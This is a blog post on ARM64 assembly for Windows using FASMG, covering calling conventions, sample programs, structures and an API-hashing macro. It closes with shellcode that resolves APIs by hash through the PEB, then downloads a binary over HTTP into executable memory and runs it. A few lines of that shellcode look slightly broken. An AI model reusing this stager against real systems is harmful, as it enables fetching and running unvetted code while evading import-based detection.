Back in October 2018, I wanted to write ARM assembly on Windows. All I could acquire then was a Surface tablet running Windows RT, released in October 2012. Windows RT (now deprecated) was a version of Windows 8 designed to run on the 32-bit ARMv7 architecture. By the summer of 2013, it was considered a commercial flop.
For developers, it was possible to compile binaries on a separate machine and get them running on the tablet via USB stick or network, but unless you obtained a developer license, a jailbreak exploit was required. With so many limitations, my attention shifted towards Linux on a Raspberry Pi 4.
From what I read, the release of Windows 10 for ARMv7 in 2015 was a distinct improvement over Windows RT. Limitations for developers persisted, but at least Microsoft provided support for emulating x86 applications. Today, I finally have an ARM64 device running Windows 11 without all the problems that plagued previous versions. There’s full native support for developers with Visual Studio 2022 and a Linux subsystem that can run Ubuntu or Debian if you want to program ARM64 applications for Linux. (I know WSL isn’t new, but still.) Best of all, perhaps, is the ability to emulate both 32-bit and 64-bit x86 applications.
To support Windows on ARM, you have at least three options:
MSVC and LLVM-MinGW are best for C/C++. I prefer the GNU Assembler (as) over the ARM Macro Assembler (armasm64) shipped by Microsoft, but the main problem with both is their limited support for macros. armasm64 supports most of the directives documented by ARM, but appears to have limitations. From what I can tell, armasm64 has no support for structures, which makes it very difficult to write programs in assembly. This is also a problem with the GNU Assembler, and the only way around it is to use symbolic names with the hardcoded offset of each field.
There is some hope. Despite having no direct support for the ARM architecture, flat assembler g (FASMG) by Tomasz Grysztar is an adaptable assembly engine that “has the ability to become an assembler for any CPU architecture.” There are include files for FASMG that implement ARM64 instructions using macros, and it’s what I decided to use for a simple PoC in this post.
Once you set up FASMG, copy the AARCH64 macros from asmFish to the include directory. My own batch file, which I execute from a command prompt inside the root directory of fasm, looks like this:
@echo off
set include=C:\fasmw\fasmg\packages\utility;C:\fasmw\fasmg\packages\x86\include
set path=%PATH%;C:\fasmw\fasmg\core
Tomasz has also provided an ARM64 example to get started.
Windows uses the same calling convention as Linux for subroutines. However, the invocation of system calls is different: Linux uses x8 to hold the system call ID, whereas Windows embeds the ID in the SVC instruction.
Register | Volatile? | Role |
---|---|---|
x0 | Yes | Parameter/scratch register 1, result register |
x1-x7 | Yes | Parameter/scratch register 2-8 |
x8-x15 | Yes | Scratch registers. Used as parameter too. |
x16-x17 | Yes | Intra-procedure-call scratch registers |
x18 | No | Platform register: in kernel mode, points to KPCR for the current processor; in user mode, points to TEB |
x19-x28 | No | Scratch registers |
x29/fp | No | Frame pointer |
x30/lr | No | Link register |
x31/xzr | No | Zero register |
Initially, I started working with ARMASM, so the following is just an example of how to create a simple console application.
; armasm64 hello.asm -ohello.obj
; cl hello.obj /link /subsystem:console /entry:start kernel32.lib

    AREA .drectve, DRECTVE

; invoke API without repeating the same instructions
; $p1 should be a free register used to load the address of the API
    MACRO
    INVOKE $p1, $p2 ; name of macro followed by its parameters
    adrp $p1, __imp_$p2
    ldr $p1, [$p1, __imp_$p2]
    blr $p1
    MEND

; saves time typing "__imp_" for each API imported
    MACRO
    IMPORT_API $p1
    IMPORT __imp_$p1
    MEND

    AREA data, DATA

Text DCB "Hello, World!\n"

; symbolic constants for clarity
NULL equ 0
STD_OUTPUT_HANDLE equ -11

; the entrypoint
    EXPORT start

; the API used
    IMPORT_API ExitProcess
    IMPORT_API WriteFile
    IMPORT_API GetStdHandle

; start of code to execute
    AREA text, CODE
start PROC
    mov x0, STD_OUTPUT_HANDLE
    INVOKE x1, GetStdHandle

    mov x4, NULL
    mov x3, NULL
    mov x2, 14 ; string length...
    adr x1, Text
    INVOKE x5, WriteFile

    mov x0, NULL
    INVOKE x1, ExitProcess
    ENDP
    END
And a simple GUI. A version for FASMG can be found here.
; armasm64 msgbox.asm -omsgbox.obj
; cl msgbox.obj /link /subsystem:windows /entry:start kernel32.lib user32.lib

    AREA .drectve, DRECTVE

; invoke API without repeating the same instructions
; p1 should be the free register available to load address of API
    MACRO
    INVOKE $p1, $p2
    adrp $p1, __imp_$p2
    ldr $p1, [$p1, __imp_$p2]
    blr $p1
    MEND

; saves time typing "__imp_" for each API imported
    MACRO
    IMPORT_API $p1
    IMPORT __imp_$p1
    MEND

    AREA data, DATA

Text DCB "Hello, World!", 0x0
Caption DCB "Hello from ARM64", 0x0

; symbolic names for clarity
NULL equ 0

; the entrypoint
    EXPORT start

; the API used
    IMPORT_API ExitProcess
    IMPORT_API MessageBoxA

; start of code to execute
    AREA text, CODE
start PROC
    mov x3, NULL
    adr x2, Caption
    adr x1, Text
    mov x0, NULL
    INVOKE x4, MessageBoxA

    mov x0, NULL
    INVOKE x1, ExitProcess
    ENDP
    END
; The following are 64-bit offsets.
TEB_ProcessEnvironmentBlock = 0x00000060
TEB_LastErrorValue = 0x00000068

PEB_Ldr = 0x00000018
PEB_LDR_DATA_InLoadOrderModuleList = 0x00000010
LDR_DATA_TABLE_ENTRY_DllBase = 0x00000030

IMAGE_DOS_HEADER_e_lfanew = 0x0000003C

IMAGE_EXPORT_DIRECTORY_Characteristics = 0x00000000
IMAGE_EXPORT_DIRECTORY_TimeDateStamp = 0x0004
IMAGE_EXPORT_DIRECTORY_MajorVersion = 0x0008
IMAGE_EXPORT_DIRECTORY_MinorVersion = 0x000A
IMAGE_EXPORT_DIRECTORY_Name = 0x0000000C
IMAGE_EXPORT_DIRECTORY_Base = 0x00000010
IMAGE_EXPORT_DIRECTORY_NumberOfFunctions = 0x00000014
IMAGE_EXPORT_DIRECTORY_NumberOfNames = 0x00000018
IMAGE_EXPORT_DIRECTORY_AddressOfFunctions = 0x0000001C
IMAGE_EXPORT_DIRECTORY_AddressOfNames = 0x00000020
IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals = 0x00000024

STATFLAG_DEFAULT = 0
STATFLAG_NONAME = 1
STATFLAG_NOOPEN = 2

STREAM_SEEK_SET = 0
STREAM_SEEK_CUR = 1
STREAM_SEEK_END = 2
FASMG provides macros for struct and union declarations, similar to those supported by Borland’s Turbo Assembler or Microsoft’s Macro Assembler.
struct LARGE_INTEGER
    LowPart dd ?
    HighPart dd ?
ends

struct ULARGE_INTEGER
    LowPart dd ?
    HighPart dd ?
ends

struct GUID
    Data1 dd ?
    Data2 dw ?
    Data3 dw ?
    Data4 db 8 dup(?)
ends

struct STATSTG
    pwcsName dq ? ; LPOLESTR
    _type dd ? ; DWORD
    _padding dd ? ; padding for _type
    cbSize ULARGE_INTEGER
    mtime FILETIME
    ctime FILETIME
    atime FILETIME
    grfMode dd ?
    grfLocksSupported dd ?
    clsid GUID
    grfStateBits dd ?
    reserved dd ?
ends
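One way to sanity-check hand-written structure definitions like these is to mirror them in a scripting language and print the field offsets. The following is only a sketch using Python's ctypes. It assumes FILETIME consists of two 32-bit fields (as declared in the Windows SDK, not shown in this post), stores the pointer as a plain 64-bit integer, and renames `_type`/`_padding` to `type_`/`padding` for convenience.

```python
import ctypes

class ULARGE_INTEGER(ctypes.Structure):
    _fields_ = [("LowPart", ctypes.c_uint32), ("HighPart", ctypes.c_uint32)]

class FILETIME(ctypes.Structure):
    # Assumption: layout taken from the Windows SDK, not from this post.
    _fields_ = [("dwLowDateTime", ctypes.c_uint32),
                ("dwHighDateTime", ctypes.c_uint32)]

class GUID(ctypes.Structure):
    _fields_ = [("Data1", ctypes.c_uint32),
                ("Data2", ctypes.c_uint16),
                ("Data3", ctypes.c_uint16),
                ("Data4", ctypes.c_ubyte * 8)]

class STATSTG(ctypes.Structure):
    _fields_ = [("pwcsName", ctypes.c_uint64),   # LPOLESTR as a 64-bit value
                ("type_", ctypes.c_uint32),
                ("padding", ctypes.c_uint32),
                ("cbSize", ULARGE_INTEGER),
                ("mtime", FILETIME),
                ("ctime", FILETIME),
                ("atime", FILETIME),
                ("grfMode", ctypes.c_uint32),
                ("grfLocksSupported", ctypes.c_uint32),
                ("clsid", GUID),
                ("grfStateBits", ctypes.c_uint32),
                ("reserved", ctypes.c_uint32)]

# Print every field offset so it can be compared with the assembler's view.
for name, _ in STATSTG._fields_:
    print(f"{name:20s} 0x{getattr(STATSTG, name).offset:02X}")
print("sizeof(STATSTG) =", ctypes.sizeof(STATSTG))
```

If the numbers printed here disagree with what the assembler computes for `STATSTG.cbSize` or `sizeof.STATSTG`, one of the two definitions is probably missing a padding field.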
The shellcode uses the IStream object to read data from the HTTP request. FASMG provides macros to declare an interface. There are also comcall and cominvk macros to invoke interface methods, but I decided not to use them here. As pointed out before in relation to executing .NET assemblies, interfaces are just structures with function pointers.
struct IStreamVtbl
    ; IUnknown
    QueryInterface dq ?
    AddRef dq ?
    Release dq ?

    ; ISequentialStream
    Read dq ?
    Write dq ?

    ; IStream
    Seek dq ?
    SetSize dq ?
    CopyTo dq ?
    Commit dq ?
    Revert dq ?
    LockRegion dq ?
    UnlockRegion dq ?
    Stat dq ?
    Clone dq ?
ends

struct IStream
    lpVtbl dq ? ; pointer to IStreamVtbl
ends
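Because the virtual table is just an array of 64-bit function pointers, the offset of each method is its position in the table multiplied by eight. A small Python sketch of that arithmetic follows; the list simply repeats the method order from the structure above, and `vtbl_offset` is a hypothetical helper name.

```python
# Method order copied from the IStreamVtbl structure above.
ISTREAM_METHODS = [
    "QueryInterface", "AddRef", "Release",           # IUnknown
    "Read", "Write",                                  # ISequentialStream
    "Seek", "SetSize", "CopyTo", "Commit", "Revert",  # IStream
    "LockRegion", "UnlockRegion", "Stat", "Clone",
]

POINTER_SIZE = 8  # bytes per entry on a 64-bit target


def vtbl_offset(method: str) -> int:
    """Return the byte offset of a method pointer inside the vtable."""
    return ISTREAM_METHODS.index(method) * POINTER_SIZE


for method in ("Read", "Seek", "Stat"):
    print(f"IStreamVtbl.{method} = 0x{vtbl_offset(method):02X}")
```

These are the values an expression such as `IStreamVtbl.Stat` should evaluate to when used as a load offset.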
FASMG doesn’t support local (stack) variables out of the box. But what you can do is define a structure with your variables in it.
struct var_tbl
    pStream IStream
    Stg STATSTG
    liZero LARGE_INTEGER
    BytesRead dq ?
    pCode dq ?
ends
On entry to the program or a subroutine, subtract the size of the structure (rounded up to a multiple of 16) from the stack pointer.
sub sp, sp, ((sizeof.var_tbl + 15) and -16)
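The expression `(size + 15) and -16` rounds a size up to the next multiple of 16, which keeps the stack pointer 16-byte aligned. Here is the same arithmetic as a short Python sketch; `align_up` is a hypothetical helper and the sample sizes are arbitrary.

```python
def align_up(size: int, alignment: int = 16) -> int:
    """Round size up to the next multiple of alignment (a power of two)."""
    return (size + alignment - 1) & -alignment


# Arbitrary sample sizes, chosen only to show the rounding behaviour.
for size in (1, 16, 100, 112, 113):
    print(f"{size:3d} -> {align_up(size)}")
```

Adding 15 pushes any size that is not already a multiple of 16 past the next boundary, and masking with -16 clears the low four bits.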
Then, when you need the address of a variable, add its offset to the stack pointer with the ADD instruction.
; x2 = &var_tbl.pStream
add x2, sp, var_tbl.pStream
To access the value stored in var_tbl.pStream:
; x2 = var_tbl.pStream
ldr x2, [sp, var_tbl.pStream]
The most powerful feature of FASMG is its support for macros. It’s possible to implement cryptographic hashes like SHA256, SHA512 and SHA3 purely with macros. The following macro, which computes an API hash at assembly time, doesn’t demonstrate the full potential of FASMG at all.
macro hash_api dll_name, api_name
    local dll_hash, api_hash, b

    ; DLL
    virtual at 0
        db dll_name
        dll_hash = 0
        repeat $
            load b byte from % - 1
            dll_hash = (dll_hash + b) and 0xFFFFFFFF
            dll_hash = ((dll_hash shr 8) and 0xFFFFFFFF) or ((dll_hash shl 24) and 0xFFFFFFFF)
        end repeat
    end virtual

    ; API
    virtual at 0
        db api_name
        api_hash = 0
        repeat $
            load b byte from % - 1
            api_hash = (api_hash + b) and 0xFFFFFFFF
            api_hash = ((api_hash shr 8) and 0xFFFFFFFF) or ((api_hash shl 24) and 0xFFFFFFFF)
        end repeat
    end virtual

    dd (dll_hash + api_hash) and 0xFFFFFFFF
end macro
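For readers who want to compute the same values outside the assembler, the macro can be modelled in a few lines of Python. This is a sketch of the algorithm as written above (add each byte, then rotate right by 8 bits within 32 bits); the function names are my own, and like the macro it does not change the case of the DLL name.

```python
MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by the given number of bits."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def hash_name(name: str) -> int:
    """Add each byte to the running hash, then rotate right by 8."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32((h + byte) & MASK32, 8)
    return h


def hash_api(dll_name: str, api_name: str) -> int:
    """Combine the DLL hash and the API hash, as the macro's final dd does."""
    return (hash_name(dll_name) + hash_name(api_name)) & MASK32


for dll, api in (("kernelbase.dll", "LoadLibraryA"),
                 ("urlmon.dll", "URLOpenBlockingStreamA")):
    print(f"{dll}!{api}: 0x{hash_api(dll, api):08X}")
```

Having an independent implementation makes it easier to debug a shellcode that fails to resolve an API, since the expected constant can be compared against the value stored in the hash table.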
xpr is an alias for the x18 register. As noted in the table of integer registers, it contains a pointer to the TEB for user-mode applications. Every offset used by AMD64 can probably be used for ARM64. However, it would be safer to check the debugging symbols.
On x86, the syscall number is placed in the accumulator (EAX/RAX), but on ARM64 it’s embedded in the SVC opcode itself and there appears to be no alternative (at least not that I’m aware of). Building a new stub would require allocating memory with NtAllocateVirtualMemory and manually encoding the instruction.
The following code uses URLOpenBlockingStream to download shellcode and execute it in memory.
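To illustrate what "manually encoding the instruction" involves: in the A64 instruction set, SVC is a 32-bit word with the fixed bits 0xD4000001 and a 16-bit immediate stored in bits 5 to 20. The Python sketch below encodes and decodes that word. The helper names are hypothetical, and the number 0x1234 is a placeholder rather than a real Windows system call ID.

```python
import struct

SVC_BASE = 0xD4000001   # fixed opcode bits of the A64 SVC instruction
SVC_MASK = 0xFFE0001F   # every bit except the imm16 field


def encode_svc(imm16: int) -> bytes:
    """Return the little-endian machine code for 'svc #imm16'."""
    if not 0 <= imm16 <= 0xFFFF:
        raise ValueError("immediate must fit in 16 bits")
    return struct.pack("<I", SVC_BASE | (imm16 << 5))


def decode_svc(code: bytes) -> int:
    """Extract imm16 from a 4-byte SVC instruction."""
    (word,) = struct.unpack("<I", code)
    if word & SVC_MASK != SVC_BASE:
        raise ValueError("not an SVC instruction")
    return (word >> 5) & 0xFFFF


stub = encode_svc(0x1234)   # placeholder ID, not a real syscall number
print(stub.hex(), hex(decode_svc(stub)))
```

Since system call numbers change between Windows builds, any stub built this way would need to obtain the correct immediate at run time.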
start:
    ;brk #0xF000
    sub sp, sp, ((sizeof.var_tbl + 15) and -16)

    adr x20, hash_tbl
    adr x21, invoke_api

    ; LoadLibraryA("urlmon.dll")
    adr x0, urlmon_name
    blr x21
    cbz x0, exit_shellcode

    ; hr = URLOpenBlockingStreamA(NULL, szUrl, &pStream, 0, 0);
    mov x4, xzr
    mov x3, xzr
    add x2, sp, var_tbl.pStream
    adr x1, url_path
    mov x0, xzr ; NULL
    blr x21
    cbnz x0, exit_shellcode

    ; STATSTG Stg;
    ; hr = pStream->Stat(&Stg, STATFLAG_NONAME);
    mov x2, STATFLAG_NONAME
    add x1, sp, var_tbl.Stg
    ldr x0, [sp, var_tbl.pStream]
    ldr x3, [x0, IStream.lpVtbl]
    ldr x3, [x3, IStreamVtbl.Stat]
    blr x3
    cbnz x0, exit_shellcode

    ; LARGE_INTEGER liZero = { 0 };
    ; hr = pStream->Seek(liZero, STREAM_SEEK_SET, NULL);
    mov x3, xzr ; NULL
    mov x2, xzr ; STREAM_SEEK_SET
    add x1, sp, var_tbl.liZero
    str xzr, [x1]
    mov x1, xzr
    ldr x0, [sp, var_tbl.pStream]
    ldr x4, [x0, IStream.lpVtbl]
    ldr x4, [x4, IStreamVtbl.Seek]
    blr x4
    cbnz x0, exit_shellcode

    ; pCode = VirtualAlloc(NULL, Stg.cbSize.LowPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    mov x3, PAGE_EXECUTE_READWRITE
    mov x2, MEM_COMMIT
    ldr w1, [sp, var_tbl.Stg.cbSize.LowPart]
    mov x0, NULL
    blr x21
    cbz x0, exit_shellcode
    str x0, [sp, var_tbl.pCode]

    ; hr = pStream->Read(pCode, Stg.cbSize.LowPart, &BytesRead);
    add x3, sp, var_tbl.BytesRead
    ldr w2, [sp, var_tbl.Stg.cbSize.LowPart]
    ldr x1, [sp, var_tbl.pCode]
    ldr x0, [sp, var_tbl.pStream]
    ldr x4, [x0, IStream.lpVtbl]
    ldr x4, [x4, IStreamVtbl.Read]
    blr x4
    cbnz x0, exit_shellcode

    ldr x0, [sp, var_tbl.pCode]
    blr x0

    blr x21
    cbz x0, exit_shellcode

exit_shellcode:
    add sp, sp, ((sizeof.var_tbl + 15) and -16)
    ret

invoke_api:
    ; save parameters, except for x0, which won't be used.
    stp x1, x2, [sp, -64]!
    stp x3, x4, [sp, 16]
    stp x5, x6, [sp, 32]
    stp x7, x8, [sp, 48]

    ; Ldr = (PPEB_LDR_DATA)NtCurrentTeb()->ProcessEnvironmentBlock->Ldr;
    mov x1, x18 ; xpr
    ldr x2, [x1, TEB_ProcessEnvironmentBlock]
    ldr x2, [x2, PEB_Ldr]

    ; end = (PLIST_ENTRY)&Ldr->InLoadOrderModuleList;
    add x2, x2, PEB_LDR_DATA_InLoadOrderModuleList
    ; nxt = end->Flink;
    ldr x3, [x2] ; read first entry
nxt_dll:
    cmp x3, x2 ; while (nxt != end)
    bne load_dll_loop
    add sp, sp, 64 ; fixup stack
    ;ret ; return to caller
load_dll_loop:
    ; bx = e->DllBase
    ldr x4, [x3, LDR_DATA_TABLE_ENTRY_DllBase]
    ldr x3, [x3] ; nxt = nxt->Flink

    ; nt = VA(PIMAGE_NT_HEADERS, bx, ((PIMAGE_DOS_HEADER)e->DllBase)->e_lfanew);
    ldr w5, [x4, IMAGE_DOS_HEADER_e_lfanew]
    add x5, x4, w5, uxtw #0

    ; va = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    ; if (!va) continue;
    ldr w5, [x5, #0x88]
    cbz w5, nxt_dll

    ; exp = VA(PIMAGE_EXPORT_DIRECTORY, bx, va);
    add x5, x4, w5, uxtw #0

    ; cnt = exp->NumberOfNames;
    ; if (!cnt) continue;
    ldr w6, [x5, IMAGE_EXPORT_DIRECTORY_NumberOfNames]
    cbz w6, nxt_dll

    ; dll = VA(PCHAR, bx, exp->Name);
    ldr w7, [x5, IMAGE_EXPORT_DIRECTORY_Name]
    add x7, x4, w7, uxtw #0
    mov w8, #0 ; dx = 0
hash_dll:
    ; while (*dll) c = *dll++,
    ; c = (c >= 'A' && c <= 'Z') ? (c | 32) : c, dx += c, dx = R(dx, 8);
    ldrsb x9, [x7], 1
    cbz x9, exit_hash_dll
    sub x10, x9, 'A'
    orr x11, x9, 32
    cmp x10, 26
    csel x9, x11, x9, cc
    add w8, w8, w9
    ror w8, w8, 8
    b hash_dll
exit_hash_dll:
    ; aon = VA(PDWORD, bx, exp->AddressOfNames);
    ldr w9, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNames]
    add x9, x4, w9, uxtw #0
    mov x10, #0
nxt_api:
    mov x11, #0
    ; api = VA(PCHAR, bx, aon[i]);
    ldr w12, [x9, w10, uxtw #2]
    add x12, x4, w12, uxtw #0
hash_api_loop:
    ; while (*api) ax += *api++, ax = R(ax, 8);
    ldrsb x13, [x12], 1
    cbz x13, exit_hash_api
    add w11, w11, w13
    ror w11, w11, 8
    b hash_api_loop
exit_hash_api:
    add w11, w11, w8
    ldr w12, [x20] ; load hash
    cmp w11, w12 ; if ((ax + dx) == hx)
    beq load_api

    add w10, w10, 1 ; i++
    cmp w10, w6 ; i < cnt
    bne nxt_api
    b nxt_dll
load_api:
    add x20, x20, 4

    ; aof = VA(PDWORD, bx, exp->AddressOfFunctions);
    ldr w1, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfFunctions]
    add x1, x4, x1

    ; ono = VA(PDWORD, bx, exp->AddressOfNameOrdinals);
    ldr w2, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals]
    add x2, x4, x2

    ; pfn = VA(PVOID, bx, aof[ono[i]]);
    ldrh w2, [x2, w10, uxtw #1] ; read ordinal
    ldr w1, [x1, x2, lsl #2] ; read address of function rva
    add x9, x4, w1, uxtw #0 ; add base

    ; load parameters saved on stack
    ldp x1, x2, [sp], 16
    ldp x3, x4, [sp], 16
    ldp x5, x6, [sp], 16
    ldp x7, x8, [sp], 16

    ; execute API and return to original caller.
    br x9

hash_tbl:
    hash_api "kernelbase.dll", "LoadLibraryA"
    hash_api "urlmon.dll", "URLOpenBlockingStreamA"
    hash_api "kernelbase.dll", "VirtualAlloc"
    hash_api "kernelbase.dll", "ExitThread"

urlmon_name:
    db "urlmon", 0
url_path:
    db "http://localhost:1234/notepad.arm64.bin", 0
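The search performed by invoke_api can be easier to follow in a high-level model. The Python sketch below mimics only the lookup logic: walk a list of modules, hash the lowercased DLL name, hash each exported name, and stop at the first sum that matches the target. The module table is a hypothetical stand-in for the loader list and export directories, and none of the PE parsing is modelled.

```python
MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by the given number of bits."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def hash_name(name: str, fold_case: bool = False) -> int:
    """Add-then-rotate hash; optionally fold 'A'-'Z' to lowercase first."""
    h = 0
    for ch in name.encode("ascii"):
        if fold_case and 0x41 <= ch <= 0x5A:
            ch |= 0x20
        h = ror32((h + ch) & MASK32, 8)
    return h


def resolve(target: int, modules):
    """Return (dll, api) for the first export whose combined hash matches."""
    for dll_name, exports in modules:
        dll_hash = hash_name(dll_name, fold_case=True)
        for api in exports:
            if (hash_name(api) + dll_hash) & MASK32 == target:
                return dll_name, api
    return None


# Hypothetical module table standing in for the PEB loader list.
MODULES = [
    ("ntdll.dll", ["NtClose", "RtlExitUserThread"]),
    ("KERNELBASE.dll", ["LoadLibraryA", "VirtualAlloc", "ExitThread"]),
]

wanted = (hash_name("kernelbase.dll") + hash_name("VirtualAlloc")) & MASK32
print(resolve(wanted, MODULES))
```

Only the DLL name is case-folded, which matches the assembly: export names are hashed exactly as they appear in the export directory.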